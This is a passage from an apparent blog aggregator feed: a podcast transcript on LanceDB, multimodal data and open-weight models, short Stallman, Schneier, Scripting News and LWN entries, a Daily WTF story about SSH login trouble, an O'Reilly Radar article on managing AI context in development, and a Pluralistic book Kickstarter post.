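A real implementation would back `read` and `listdir` with queries against the storage format rather than a dict, but the agent-facing surface could stay this small.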

33.29
It’s interesting, actually. As you were talking, it dawned on me that these various notions of multimodality you described earlier might be another reason people landed on Lance, because there are other vector search systems you can run in-memory or embedded. If you want to build agents that are more capable moving forward, the various notions of multimodality Chang described earlier might come in handy, right?

34.06
Yeah, yeah, absolutely. I will say that, like, there are AI maximalists; I’m sort of a multimodal maximalist. So my prediction is that in five years, multimodal won’t even be a word anymore. People will just say data, and it’ll be inclusive of all the different modalities. And there won’t be multimodal data engineering; when we say data engineering, it’ll just be multimodal by default.

34.37
Interesting, which actually. . . As we’re winding down here, I was going to ask you: If I’m a CxO or an architect at an enterprise, what data infrastructure decisions do you think I should bear in mind? Or, to put it negatively, what are some of the decisions I could make right now that could hurt my team over the next year?

35.08
Right, right. For a lot of early adopters, we already see big pain points around new AI data silos. So one pattern (I wouldn’t call it an anti-pattern, but it is a pain point) is that if you’re a CIO or CDO or something like that, chances are a lot of teams within the enterprise have charged forward with their own AI applications and AI stack. And now the centralized data platform team is faced with maybe 10 different vector databases they have to support, and maybe five different ways of storing the AI data: some as images, some as just embeddings, many different modalities. That becomes a big pain point going forward, right? And as companies go from “Let’s try out AI in this particular area” to AI transformation, with large swaths of the enterprise becoming AI-assisted or AI-native, that pain only grows.

I think if I were a CIO or a CEO or CTO at a larger enterprise, I would be looking forward a little bit to think about how to set all of my teams across the enterprise up for success: How do I allow them to charge forward and iterate very quickly without presenting this crazy, untenable challenge to the central platform team? That’s what I would be thinking about, and at LanceDB, that’s what we’re building for.

37.05
If your thesis is multimodal data matures over the next few years, and so do agents and everything that comes with agents, including memory, what does the data stack look like in a few years?

37.22
In broad strokes, the base layers are not going to change all that much. I think the infrastructure layer stays roughly the same. There’s going to be object storage. There’s going to be a storage layer. And then the compute layer will start to change. 

37.49
Ray. [laughs]

37.52
What I think we’ll see is that the middle layer of data tooling will start to melt away a little bit because of agents.

38.04
Define data tooling.

38.07
I don’t want to name names, but I think there’s a lot of what I would call developer middleware for data, where it’s neither the infrastructure layer nor the layer that’s interfacing with agents and users directly, right? That middle layer, I think, will melt away a little bit, or at least be very much refactored. There’s going to be a lot of churn there, and it’ll be interesting to see what shakes out. I think what will happen is that agents will continue to push that layer down; agents will want to get as close to the base layer as possible.

If you look at this middle layer, there are really two things it provides. One is a precanned data model for how its users think about the problem, built on top of the base infrastructure; they would build that on top of LanceDB, for example. The other thing this middle tier has right now is user interaction. The combination of the two is how they capture user workflows; that’s the core of it. I think what happens in the future is that the UI workflow layer will largely go away and be replaced by agents.

But useful data models will still be useful, and they’ll stay. Yes, you can have agents directly talk to random bits on S3, but why waste all that intelligence? It’s not worth the token cost. A well-formed data model is the right base layer for agents to interact with. So I think that’s what we’ll see: the melting away and reformatting of that middle layer. When I talk to data builders and AI infrastructure builders today, we’re all seeing this at the same time.

40.22
What I describe to people right now as the forward-looking stack has two main parts. One, you have the multimodal lakehouse built around Lance, LanceDB, and the Lance format. And then you have the AI compute layer, which I call the PARK stack: PyTorch, AI foundation models, Ray, and Kubernetes. So the PARK stack here, and then your lakehouse built around Lance and the Lance format. I see that quite a bit, actually. I definitely see the PARK stack, and now I’m starting to see more and more people talking about Lance and the Lance format. Do you think of these as complementary, or what?

41.16
Yeah, yeah, absolutely. We have close relationships with Ray and Spark, really native-level integrations, and also with PyTorch, right? I don’t think those are going away. PyTorch is essentially interacting with developers directly, whereas Spark and Ray are very much the infrastructure layer, so I don’t think those things are going anywhere. Kubernetes is definitely still around.

41.51
Yeah, yeah, yeah, yeah. And so what big trend are you paying attention to right now that we haven’t yet talked about? This is how we close.

42.08
What’s been really interesting, and we didn’t talk about it, is the rise of open source models in enterprise AI. I think that’s going to have a big impact, maybe starting next year or even in the remainder of this year. [Ben: Open weight.] Open-weight models, that’s correct. Yeah.

42.35
Who’s the source? Because right now the main source of the better ones is China, and I still see a lot of hesitation among enterprise teams to adopt such models. I actually just wrote a short post about this. Basically, the perception seems to be that while the open-weight models from China are closing the gap, there is still a gap, and there are structural reasons for it. One, the Chinese labs seem to be benchmaxxing: They’re optimizing for the benchmarks, not real workloads. Two, there is a compute challenge, which makes iteration more difficult for them; whereas the labs here may update their models every three or four months, the Chinese labs have to wait six. And finally, the investment in data pipelines is just not the same as you’d see at, for example, Gemini, Anthropic, and OpenAI, which are licensing data from all over the place. The Chinese labs tend to do distillation, and when you’re doing distillation, your ceiling is basically the model you’re distilling from.

And then there’s the flywheel: OpenAI and Anthropic and Gemini have a lot of users, so they get better as more users interact with them. . .

44.20
That’s right. Don’t forget the open-weight models in China are also. . . [cross-talk] Here’s the way I think about it, right? As AI adoption grows exponentially within enterprises, they are going to be extremely motivated to invest in their own inference on open-weight models, just because the cost in tokens is so drastic.

Because of that economic incentive, I think there’s going to be a lot more motivation for companies to create better open-weight models. And if you look at the open-weight models in China, the fact that they can create models of this quality on really limited hardware is telling: A team in the US should, in theory, be able to create much better open-weight models.

Number two, I don’t think the distillation argument is actually true. If you look at the report that Anthropic put out, the numbers for how much distillation they accused DeepSeek of doing are actually not that large; it’s basically negligible. MiniMax is a legitimately big offender, but DeepSeek basically didn’t do that much. So I don’t think distillation is a big factor in the quality of open-weight models anymore.

So then there is a remaining gap in quality; maybe there’s a three- to four-month gap between open-weight models and SOTA. But what’s interesting in the experiments people have done is that open-weight models are, one, cheaper, and two, much faster. So for a coding agent task, you can do one shot with a SOTA model, or you can do multiple rounds and iterations on an open-weight model, which gets you the same quality at a lower total cost in tokens, and you finish around the same time or might even finish faster. So I think a lot of the hesitation is lack of familiarity and a skill gap: If you have to do a few shots, that complexity is more than most people want to think about right now.
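The trade-off can be illustrated with some back-of-the-envelope arithmetic. All prices and token counts below are made-up numbers chosen only to show the shape of the comparison, not real model pricing:

```python
# Illustrative only: hypothetical $/million tokens and token budgets.
sota_price_per_mtok = 15.00  # assumed price for a SOTA model
open_price_per_mtok = 2.00   # assumed price for an open-weight model

sota_rounds, sota_tokens_per_round = 1, 200_000  # one-shot with the SOTA model
open_rounds, open_tokens_per_round = 4, 150_000  # several cheaper iterations

sota_cost = sota_rounds * sota_tokens_per_round / 1e6 * sota_price_per_mtok
open_cost = open_rounds * open_tokens_per_round / 1e6 * open_price_per_mtok

print(f"SOTA one-shot:       ${sota_cost:.2f}")  # $3.00
print(f"Open, {open_rounds} iterations: ${open_cost:.2f}")  # $1.20
```

Under these assumed numbers the open-weight run uses three times as many total tokens yet still costs less, which is the dynamic being described: more rounds, lower bill, roughly comparable wall-clock time if the cheaper model is also faster.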

So the pattern today is: You go into production with SOTA models, then you reach some cost-prohibitive moment where you say, “OK, what are the areas that don’t require really heavy intelligence but still carry a lot of token cost, and can I replace those with open models?” I think that will happen more and more across enterprises, so it’s going to be a big trend to watch this year and next.

47.18
And actually, as you mentioned, my conversations are a product of the stage of adoption, which is basically the early stage: I deploy with state-of-the-art models because I’m early. Then, as my agent or application gets used, I start paying attention to cost, latency, and all that, and I can worry about swapping models then. And hopefully we’ll have some Western labs start cranking on open-weight models again, right? It seems like Meta is off the table, and the Gemma folks produce models, but they’re meant for on-device, I think. Maybe there’s an opening there for someone to start up something that. . .

Especially as people become more clever about training, and tools like LanceDB make training more affordable somehow. We’ll see what happens. And with that, thank you, Chang.

48.24
That’s right. Thank you, Ben.

17:56

Urgent: Shut down the hidden sweatshops of data workers [Richard Stallman's Political Notes]

US citizens: call on Congress to shut down the hidden sweatshops of data workers.

See the instructions for how to sign this letter campaign without running any nonfree JavaScript code--not trivial, but not hard.

I ask you to follow me in expunging the acronym "AI" from your letter.

Sending asylum seekers to a country they've never been [Richard Stallman's Political Notes]

Australia's cunning cruelty of sending asylum seekers to (in effect) prison in a country where they have never been is now spreading world-wide.

17:28

Upcoming Speaking Engagements [Schneier on Security]

This is a current list of where and when I am scheduled to speak:

The list is maintained on this page.

16:56

Link [Scripting News]

Every social web needs avatars. In an RSS 2.0 feed, look for the channel-level image element. It's how they do it in WordPress.
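For reference, the channel-level image can be read out of a feed with a few lines of Python's standard library; the feed content here is a minimal illustrative example, not any real blog's feed:

```python
import xml.etree.ElementTree as ET

# A minimal RSS 2.0 feed with a channel-level <image> element.
FEED = """\
<rss version="2.0">
  <channel>
    <title>Example Blog</title>
    <link>http://example.com/</link>
    <description>An example feed</description>
    <image>
      <url>http://example.com/avatar.png</url>
      <title>Example Blog</title>
      <link>http://example.com/</link>
    </image>
  </channel>
</rss>
"""

def channel_avatar(feed_xml):
    """Return the channel-level image URL, or None if the feed has none."""
    image_url = ET.fromstring(feed_xml).find("channel/image/url")
    return image_url.text if image_url is not None else None

print(channel_avatar(FEED))  # http://example.com/avatar.png
```

A feed reader can fall back to a default avatar when `channel_avatar` returns None, since the image element is optional in RSS 2.0.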

Link [Scripting News]

This is the first day since the NBA playoffs started that there is no scheduled game. I think that's why today feels so weird.

Link [Scripting News]

For some reason every day feels like Saturday. I don't know why.

16:07

[$] Buffered atomic writes, writethrough, and more [LWN.net]

In back-to-back sessions at the start of the 2026 Linux Storage, Filesystem, Memory Management, and BPF Summit (which spilled over into a third slot), the atomic-buffered-writes feature was discussed. In the first session, Pankaj Raghav and Andres Freund set the stage with an introduction to the problem, along with a use case for its solution: the PostgreSQL database system. In the second, Ojaswin Mujoo described a potential way forward for the feature using an approach based on writethrough, which effectively means that the kernel immediately writes the data to disk instead of waiting for writeback from the page cache to occur. As might be expected, there was quite a bit of discussion among the assembled filesystems and storage developers during the combined sessions for those tracks.

Three stable kernels for Thursday [LWN.net]

Greg Kroah-Hartman has announced the release of the 7.0.7, 6.18.30, and 6.12.88 stable kernels. These kernels do not include a patch for the Fragnesia local-privilege-escalation exploit that came to light on May 13, but do include many other important fixes throughout the tree. Users are, as always, advised to upgrade.

15:21

Suddenly, Irises! [Whatever]

Athena started the bloomposting yesterday and here is my contribution: the irises in our front yard, which are in their annual two-week period of blooming, followed by 50 weeks of just being green shrubs. Still, for those two weeks, it’s pretty great to look at.

The irises have come in nicely this year

John Scalzi (@scalzi.com) 2026-05-14T12:42:09.714Z

I of course can take no credit for these irises. Krissy planted them several years ago and tends to them annually; I just go out and take pictures of them when they’ve all popped. Still, I flatter myself that I take some fairly decent pictures of them. And then you get to appreciate them as well! So, please do.

This concludes our bloomposting for today, now back to our regularly scheduled programming.

— JS

14:35

[$] Keeping COWs in context (a.k.a. anonymous reverse mapping) [LWN.net]

The kernel's reverse-mapping machinery is charged with locating the page-table entries that refer to a given page in memory. The reverse mapping of anonymous pages is handled differently than for file-backed pages. The kernel's implementation of reverse mapping for anonymous pages is, according to Lorenzo Stoakes in his proposal for a memory-management-track session at the 2026 Linux Storage, Filesystem, Memory Management, and BPF Summit, "a very broken abstraction", due to its complexity. It also has some performance problems. Stoakes was there to present, in raw form, a proposed replacement that he calls a "COW context".

Security updates for Thursday [LWN.net]

Security updates have been issued by AlmaLinux (gimp, jq, and yggdrasil), Debian (nghttp2 and thunderbird), Fedora (chromium, firefox, freerdp, GitPython, kernel, kernel-headers, krb5, nano, nix, nodejs20, php, python-click, python-django5, SDL2_image, and xen), Mageia (dnsmasq, flatpak, kernel, kmod-virtualbox, kernel-linus, perl-Net-CIDR-Lite, perl-XML-LibXML, and redis), SUSE (dnsmasq, firefox, jupyter-jupyterlab, kernel, krb5, libvinylapi3, log4j, Mesa, mozjs60, NetworkManager, OpenImageIO, python-Mako, python-Pillow, and python39), and Ubuntu (dnsmasq and nginx).

14:07

The Pride Goeth [The Daily WTF]

Janči, a master's student of bioinformatics, was seated near the back of a large classroom. This was a simple compulsory elective course geared toward biologists. The professor was currently walking the class through their latest assignment. "We'll need to connect to some Linux servers," he announced.

The other students seated nearby traded blank stares. They were all Mac and Windows users with no IT background. Meanwhile Janči, a veteran Linux user, started feeling a little smug. An easy A was at hand.

Roman key (FindID 519853)

"First," the professor continued, "you'll need a private key."

After the professor had explained a few details, the first WTF came in the form of a bulk email sent to the entire class. The private key was attached. The username was the email address it was sent to.

What do you call the exact opposite of a private key? Janči wondered, bemused.

"You'll also need to download an application to help you log in," the professor said. "I recommend MobaXterm."

As he detailed the process of visiting the SSH client website to download the software, Janči tuned out. He didn't need such hand-holding. He accessed OpenSSH, tried connecting ...

... and failed.

Meanwhile, everyone around him was logging in no problem.

Janči's face burned with embarrassment at this second WTF. His first instinct was to blame the deprecated cryptography of the server. He spent most of the remaining lecture time searching for a way to let his SSH client use the deprecated ssh-dss algorithm. (It turned out to be supported the whole time, despite the warnings he received.)

Janči then tried to re-download the "private" key and adjust the SSH config file several times. He cycled through different possible usernames associated with his university email account.

No dice.

He was the only person in the class who hadn't yet logged into the server. Not even the professor was able to help him, since Janči was the only one using Linux.

Embarrassment and frustration mounted. An hour later, out of ideas, Janči fell back to downloading MobaXterm and running it inside Wine.

It didn't work.

The professor offered him a spare Windows box. "Here, try this one."

Janči booted it up, copied the "private" key to the new machine ... and still couldn't sign in.

Now, this was getting suspicious.

The lecture ended. A friend of Janči's hung back while the rest of the students filed out. "Why don't you try logging in with my credentials instead of yours?" she asked.

Janči was up for anything at that point.

It worked. On his own machine, on the Windows box, everywhere.

With that lead in mind, Janči opened the server's /etc/passwd file to look at all the usernames. He noticed that, unlike everyone else, his username and email address didn't match.

His university used Microsoft emails. Everyone had several address aliases, and they could also use whatever email address they liked in the system, even a personal one.

Janči had chosen to use a school email in the form of <number>@uni.uni. Unfortunately, the Ubuntu server didn't like the idea of a user being named just <number>, so it had renamed the account to user<number>. Some script for generating the SSH configuration had probably failed from there, because Janči also discovered that his home directory on the server was missing a .ssh directory and authorized_keys file.

Unfortunately, due to restricted access, he wasn't able to copy them from any of his classmates. In the end, he could connect to the server as any of his classmates, but not as himself.


13:49

Why Doesn’t Anyone Teach Developers About Context Management? [Radar]

This is the sixth article in a series on agentic engineering and AI-driven development. Read part one here, part two here, part three here, part four here, and part five here.

I think context management is one of the most important skills in AI-driven development, and it’s weird that compared to other AI-related topics, almost nobody talks about it. We talk about prompt engineering, about which model to use, about agentic workflows and tool use. But more than anything else, the thing that actually determines whether your AI session produces good work or mediocre work is how well you manage context (or if you even do it at all!).

A lot of developers using AI tools treat all this "context" talk as AI jargon that can be dismissed, and it's not hard to understand why. AI development tools have gotten so easy that an experienced developer can be incredibly effective just by combining vibe coding with critical thinking (that's the central idea behind the Sens-AI Framework), without really thinking about context at all. That's ironic, because despite all the "I'm functionally illiterate but I just vibe coded an entire multitenant SaaS platform" articles, and despite everyone's general concern that AI will put all developers out of work, the development skills you've been working on for years make you especially effective at writing code with AI—and context management is where those skills really shine.

Just to make sure we're all on the same page, context is (basically) everything the AI is thinking about right now: your prompt, the conversation so far, the files it's read, the decisions you've made together. When you start a fresh session with an AI, its context is wiped clean, and it starts fresh with just the initial instructions it's been given. Managing context is central to building AI agents and skills. But it's also really important when you're using tools like Claude Code, Cursor, or Copilot for day-to-day development work. Context is typically measured in tokens, and there's a finite amount of it. When the context window, or the maximum amount of information (input and output tokens) an AI model can process and retain at once, fills up, the AI starts losing track of things, and that's when you start to see it give wrong and weird answers.

Unfortunately a lot of developers read paragraphs like the last one and their eyes glaze over. Somehow it gets classified in the same part of our brains as learning how our build systems work: boring stuff we somehow don’t really want to think about because it takes us away from “real” programming. That’s a shame, because when we don’t understand the basics of how context works we waste a lot of time.

For example, here’s something I see developers do all the time that they absolutely shouldn’t. They’re deep into an AI coding session, and the AI has built up a detailed understanding of their codebase (e.g., it’s noticed patterns, it’s making good decisions, etc.). Then they start seeing “Compacting conversation” messages, or they notice the little context usage indicator in Cursor or Copilot filling up, and they don’t really know what that means. But they learned that closing the session and starting a new one seems to fix the problem. Unfortunately, all they’ve done is trade compaction for total amnesia. The new session just keeps going, producing output that looks fine, but it’s giving worse answers and generating worse code because it’s working from incomplete information.

The really weird thing is that I was writing about something really similar all the way back in 2006, long before AI was around, in Applied Software Project Management: "Missing requirements are especially insidious because they're difficult to spot." I was writing about requirements, not AI context, but the problem is the same. I've written about how prompt engineering is requirements engineering, and this is another place where the parallel holds up. When a requirement is missing, there's no artifact to flag it; you just end up with code that doesn't do what it's supposed to do. When context is missing from an AI session, there's no error message telling you what the AI forgot; you just end up with worse answers.

The cost of poor context management is actually measurable. A developer on Microsoft’s Dev Blog recently timed his own reorientation overhead and found he was spending over an hour a day just reexplaining things to his AI that it had known in a previous session. He’s not alone. There are now entire frameworks and managed services dedicated to giving agents persistent memory, from lightweight CLIs that query Copilot’s local session database to managed memory services from Cloudflare. Some of these tools are genuinely useful, but they’re solutions you need to evaluate, integrate, and maintain before they help you.

My goal in this article and the next is to give you four specific things you can do today, using whatever AI tools you’re already working with. This article covers the problem: why context management matters and how context loss affects the quality of your AI’s output. The next article covers the specific practices that emerged from building the Quality Playbook and Octobatch, things you can bring back to your own prompts, skills, and agents immediately. I’ll use real examples from those projects, because I think they’ve got some good examples that you can draw on.

We get AI wrong in both directions

I think the through line in all of this is that developers both overestimate and underestimate AI. We overestimate how much it can hold in its memory and its ability to remember things and make decisions for us. So we stuff a whole bunch of things into the context window, assume the AI will work it all out, and then get annoyed when it hallucinates or forgets.

On the other hand, we massively underestimate its ability as an orchestrator. Your prompt doesn’t just have to ask a question or ask the AI to generate something. You can give it a multistep workflow where each step writes its results to files, and the AI will coordinate the whole thing, spinning off subtasks and picking up where it left off if something breaks.

When developers take neither of those things seriously (context management or orchestration), you get a specific cycle. They treat the context window as infinite and cram everything in. Then, when the session gets too long and the AI starts losing track, they throw it all away and start fresh. They never consider the alternative: designing the workflow so the AI works from externalized files across independent sessions.

I discovered this while building the Quality Playbook. The context management was working so well inside my sessions that I realized the sessions themselves were the bottleneck. I was running the playbook in a single prompt. I think I had a record of over 15 million tokens in a single Copilot GPT-5.4 session that ran for hours, and I did eight of them in parallel. Which incidentally is why I got rate-limited for 54 hours from Copilot, which is completely fair.

The playbook was writing everything down to files as it went, which is why those runs could last that long at all. But I didn’t want that behavior. Running 15 million tokens in a single session is expensive, and if you’re on pay-as-you-go API tokens instead of a flat-rate plan like Copilot or Claude Max or Cursor, that kind of usage can be a real shock. I wanted to make the playbook available to developers who don’t want to burn that much at once. And because the context was already externalized to files, splitting into independent phases turned out to be easy.

Ask the AI to write its context down along the way

Before I get into how the pipeline splits things up, I want to talk about the practice that made the split possible in the first place: storing development context in files as you go.

I don’t mean asking the AI to export its notes at the end of a session, or writing up a “lessons learned” document after the fact. I mean baking it into the actual instructions you give the AI from the start, so it’s continually writing and updating context as it works. For Octobatch, the batch LLM orchestrator that was my first experiment in agentic engineering (I wrote about the development process in “The Accidental Orchestrator”), I had the AI write developer context in every folder, and that really made it easy to spin up a new session.

Here’s what that looks like in practice. Every new Claude Code session on Octobatch starts with a single line: “Read ai_context/DEVELOPMENT_CONTEXT.md and bootstrap yourself to continue development.” That file contains a loading sequence: read this first, then fan out to component-level CONTEXT.md files in scripts/, tui/, pipelines/, each describing its own subsystem at the right level of detail. By the time the AI finishes reading, it knows what the project is, how it’s built, what’s currently in progress, and what the active bugs are.

I think of this as shifting left. Instead of putting constraints in every prompt (don't use additionalProperties: false, always test with --limit 3), those rules live in the CONTEXT.md files. The prompt stays clean because the documentation does the heavy lifting.

And updating context files is part of every task. Before we commit anything, I have the AI review the context files and make sure they reflect what we just did. If we added a feature or fixed a bug, the context file should reflect that before we commit. Stale context causes the same kinds of problems as stale documentation, except it’s worse because the AI is actually relying on it to make decisions.

I want to be clear exactly what I mean by “development context.” Specifically, it’s the information a new AI session needs to get up to speed: what the project is, how it’s built, and what decisions have been made along the way. Tools like Claude Code read development context from files like AGENTS.md (and you can actually go to that website to learn more) at the start of every session, and if you do a thorough enough job of building up your development context and keeping it up-to-date, you can get them fully bootstrapped. They’re the blueprints for your AI sessions. I wrote in Applied Software Project Management that building software without requirements is similar to building a house without blueprints. Running AI sessions without externalized context is the same mistake. You’re relying on what’s in someone’s head instead of what’s written down. And when you’re working with AI, “someone’s head” is a context window that’s going to get compacted or thrown away.

The most important thing is that what’s in my head matches what’s in the AI’s head. The context file is just a convenient way to help us figure out whether or not we agree. When I start a new Claude Code session on a folder that has a good DEVELOPMENT_CONTEXT.md, the AI reads it and we’re immediately aligned. When I start a session without one, the AI has to rediscover everything from scratch, and it always misses things. Rediscovery is always lossy.

If you’re not already writing context files as part of your workflow, none of the fancier techniques I’m about to describe matter. This is the foundation.

Include the why, or the AI will undo your decisions

There’s a specific thing that has to go into these context files, and it took me a while to learn why it matters so much: the reasoning behind every decision.

Octobatch’s DEVELOPMENT_CONTEXT.md has a section called “Key Technical Learnings” with 49 entries, each in a specific format: What happened, Why it matters, When we discovered it, and Where in the code it applies. At the top of that section is a note in bold: “IMPORTANT: Always include the REASONING (the ‘Why’) for each learning. This prevents future sessions from ‘refactoring’ a deliberate decision.”

That note is there because without it, the AI will do exactly that. I had a case with Octobatch where we used recursive set_timer() instead of set_interval() for auto-refresh because Textual’s set_interval() callbacks aren’t reliably serviced on pushed screens. Without the “Why” in the context file, a future session would look at that code, see a “cleaner” alternative, and helpfully refactor it right back to the broken approach.
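
The timer pattern itself can be sketched without Textual using the standard library's sched module. This is a stand-in only: in Textual the calls would be made through the widget timer API, and the names and delays below are illustrative, not from Octobatch's code.

```python
import sched
import time

# A plain event scheduler stands in for Textual's timer machinery so the
# pattern runs anywhere.
scheduler = sched.scheduler(time.monotonic, time.sleep)
ticks = []

def refresh(remaining):
    """One refresh pass that re-arms itself: a recursive one-shot timer,
    rather than a fixed interval that may silently stop firing."""
    ticks.append(time.monotonic())
    if remaining > 1:
        # Re-arm only after this pass completes, from its own callback.
        scheduler.enter(0.01, 1, refresh, (remaining - 1,))

scheduler.enter(0.01, 1, refresh, (3,))
scheduler.run()
print(len(ticks))  # three refresh passes ran
```

To an AI session that lacks the "Why", the recursive version looks like needless complexity compared with a single interval timer, which is exactly why the reasoning has to travel with the code.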

The same principle applies to quality standards. Don’t just say “90% coverage for core logic.” Say “90% coverage for core logic, because expression evaluation touches randomness and seeding, where subtle bugs produce plausible-but-wrong output. The drunken sailor reseeding bug passed all visual inspection. Only statistical verification caught that sequential seeds created correlation bias (77.5% fell in water instead of a theoretical 50/50).” Without the “why,” a future AI session will argue the coverage target down. Any standard or architectural decision or unusual code pattern that doesn’t have its rationale attached is vulnerable to being optimized away by an AI that doesn’t know what problem it was solving.
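
Put together, a learning recorded in that four-part format might look like this. The entry text is illustrative, not copied from Octobatch's actual file:

```markdown
### Learning: recursive set_timer() for auto-refresh
- **What**: Auto-refresh re-arms a one-shot set_timer() from its own
  callback instead of using set_interval().
- **Why**: Textual's set_interval() callbacks aren't reliably serviced on
  pushed screens; the "cleaner" interval version silently stops
  refreshing. Do not refactor this back.
- **When**: Discovered while debugging auto-refresh on a pushed screen.
- **Where**: the TUI screen that schedules its own refresh.
```

The "Why" line is the part doing the work: it is what stops a future session from treating the decision as an accident.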

The garbage collection problem

A lot of people like to talk about the context window as your AI’s short-term or working memory, and context that’s persisted to disk as long-term memory. Personally, I’m not sure those analogies to human memory work all that well. I think it’s a lot more useful to find ways to think about context that are similar to how we manage memory in our code.

I find it especially helpful to compare context compaction to garbage collection—again, not a perfect analogy but a useful one. When you look at a GC graph in Java, you see the memory slowly fill up and then suddenly drop after each GC. That drop is the runtime figuring out what’s still being referenced and freeing everything else.

The context window does the same thing. Your conversation accumulates tokens, the AI’s context window fills up, and then compaction happens. The tool (or the model) decides what to keep and what to throw away. Compaction is lossy and automatic, and you don’t control what survives.

Java developers spent decades learning to design their allocation patterns so garbage collection wouldn’t destroy anything important. AI developers need to learn the same thing, and the learning curve should be shorter because the concepts transfer directly.

When you ask the AI to write important state to files, you're promoting it out of that volatile space. It's surprisingly easy to do this: just ask the AI to write its context to a Markdown file. For example, you can put all of the context related to a specific domain into a particular file. If the AI noticed a behavioral contract, you could have it write all the related context to a file called CONTRACTS.md. If it made a design decision, that could go into DEVELOPMENT_CONTEXT.md, a pattern I use all the time to write down all the important context needed to bootstrap a new AI session to work on the code. Those files live on disk, outside the context window, and compaction can't touch them. But if you start a new session without externalizing any of this, you're shutting down the application and losing everything that was in memory.

The first time I built Octobatch’s batch orchestrator, it was a Python script with in-memory state and a lot of hope. It worked for small batches but fell apart at scale, which is pretty much what most developers are doing with their AI context right now: keeping everything in the context window and hoping it holds together, even though that stops working once sessions get long and codebases get complex.

It’s way too easy to fall into one context management extreme or the other

The Quality Playbook exists in part because of this problem. When I was building the requirements pipeline, I discovered that single-pass requirement generation runs out of attention after about 70 requirements. The model forgets behavioral contracts it noticed earlier. And it’s completely invisible. You don’t get a stack trace or an error message or any kind of warning, just incomplete output and no way to know what’s missing.

The longer a defect goes uncorrected, the more entrenched it becomes and the more things get built on top of it. Context drift works the same way. When the AI loses track of a design decision early in a session, everything built on that lost context compounds the error. And just like a late-discovered defect, you don’t know what went wrong because the original context is gone.

I had a concrete example when I was running the playbook against virtio-win. Version 1.3.32 found four bugs. Version 1.3.33, after some changes, found only one. That regression was only diagnosable because I had EXPLORATION.md, an externalized intermediate state file that captures what the AI observed during its exploration phase. Without it, the only observable output would have been “fewer bugs this time.” I had no way to tell whether the playbook was worse, or the bugs were harder, or it had just missed something. Without externalized state, I couldn’t have answered any of those questions.

The contracts file in the pipeline exists specifically to solve this. When the model forgets about a behavioral contract it noticed earlier, that forgetting is normally invisible. But with a contracts file, every observation is written down before any requirements work begins. If a contract is in the file but has no corresponding requirement, that’s a visible, greppable gap. You can see what was forgotten and fix it.
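
As a sketch of what "visible, greppable gap" means in practice: any contract ID recorded in the contracts file that never shows up in the requirements output is a gap. The file contents and the CON-### ID convention below are hypothetical, not taken from the actual pipeline:

```python
import re

# Illustrative file contents: what the model observed, and what it
# later turned into requirements.
contracts = """\
- CON-001: retries are idempotent
- CON-002: output order matches input order
- CON-003: seeds are decorrelated
"""
requirements = """\
REQ-014 (covers CON-001): retry loop must not duplicate side effects
REQ-027 (covers CON-003): use hashed, non-sequential seeds
"""

# Every observed contract ID with no corresponding requirement is a
# visible gap: the model noticed it, then forgot it.
observed = set(re.findall(r"CON-\d+", contracts))
covered = set(re.findall(r"CON-\d+", requirements))
gaps = sorted(observed - covered)
print(gaps)  # ['CON-002']
```

The same check works as a grep over real files; the point is that forgetting becomes a diff you can inspect instead of silently missing output.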

But it’s just as easy to overcompensate. If the LLM has to constantly hop between eight different reference files, its context window fragments and you start getting hallucinations. I’ve seen this happen. You load all your context files and requirements documents and design docs into the session, and the AI gets worse, not better. It spends all its attention navigating between reference files instead of thinking about the problem.

I hit this with the Quality Playbook when I expanded the scope of a run against virtio-win from 10 files to about 60. The result was 6x more files analyzed but 75% fewer bugs found. The model burned its context on device drivers instead of going deep on the transport layer where the bugs actually were. Wider scope meant shallower analysis.

The goal isn’t to save everything. You have to decide what to externalize, what to keep in context, and what to let go. The best context file contains exactly what the AI needs for this session and nothing more.

Helping your AI manage its context helps you too

The interesting thing about all of this is that good context management really makes use of your development expertise, and it's one of those things that makes you a better developer the more you do it. Every practice I've described in this article (writing down your decisions, recording why you made them, being deliberate about what goes into a session and what doesn't) is something developers have always been told to do. We write ADRs and design docs and inline comments explaining nonobvious choices, and we all know we should do more of it. When you're working with AI, the cost of not doing it becomes immediate and visible. Your context files end up being the project documentation you should have been writing all along, except now there's something on the other end that will actually go wrong if you skip it.

And once you start thinking about context as something you actively manage, you can start designing your workflows around it. That’s what happened with the Quality Playbook, when it went from a single 15-million-token session to a set of independent phases with clean handoffs between them, and the whole split worked on the first try because the context was already externalized to files.

In the next article, I’ll get into the specific techniques you can use today in your AI agents, but also in your day-to-day AI development work.

The Quality Playbook is open source and works with GitHub Copilot, Cursor, and Claude Code. It’s also available as part of awesome-copilot.


Disclosure: Aspects of the approach described in this article are the subject of US Provisional Patent Application No. 64/044,178, filed April 20, 2026 by the author. The open-source Quality Playbook project (Apache 2.0) includes a patent grant to users of that project under the terms of the Apache 2.0 license.

12:14

Pluralistic: Kickstarting "The Reverse Centaur's Guide to Life After AI" (14 May 2026) [Pluralistic: Daily links from Cory Doctorow]

Today's links



A mockup of a smartphone displaying an audiobook app that's playing 'The Reverse Centaur's Guide to Life After AI'. Next to it appears this text: 'This book - ostensibly about AI, but more broadly about the new world of hyper-capitalism and high tech - is stunning in its clarity and breadth of vision. In trying to keep some kind of grasp on what is going on in the world, I read Doctorow obsessively. —Brian Eno'

Kickstarting "The Reverse Centaur's Guide to Life After AI" (permalink)

My next book, The Reverse Centaur's Guide to Life After AI, will be out in about a month – and (once again) Amazon's monopoly audiobook platform refuses to carry it, and so (once again) I'm pre-selling the audio, ebook and print edition in a Kickstarter campaign that proves that DRM-free isn't just the right way to reach an audience, it's also the best way to reach them:

https://www.kickstarter.com/projects/doctorow/the-reverse-centaurs-guide-to-life-after-ai

A mockup of a smartphone displaying an audiobook app that's playing 'The Reverse Centaur's Guide to Life After AI'. Next to it appears this text: 'An eye-opening take on AI . . . A sharply worded, irreverent, and deadly serious call to see through the sleight-of-hand performance of AI promoters. —Kirkus Reviews'

Reverse Centaur is a book about the realpolitik and the political economy of AI, written by a tech critic (me!) who is sick to the back teeth of hearing about AI. Central to the book's thesis:

  • The AI bubble is exceptionally bad and dangerous:

https://pluralistic.net/2026/05/07/dump-the-pumpers/#alpo-eaters-anonymous

A mockup of a smartphone displaying an audiobook app that's playing 'The Reverse Centaur's Guide to Life After AI'. Next to it appears this text: 'A bracing, daringly optimistic plan for how we can free ourselves from the awfulness. —John Hodgman (on Enshittification)'

  • The AI bubble is part of a lineage of pump-and-dump swindles created by monopolists who are desperate to convince investors that they can continue to grow even after they've saturated their markets:

https://pluralistic.net/2025/03/06/privacy-last/#exceptionally-american

  • In service to that stock swindle, AI companies have cooked up all kinds of ways to "juke the stats" to paint a false picture of AI adoption:

https://pluralistic.net/2025/05/02/kpis-off/#principal-agentic-ai-problem

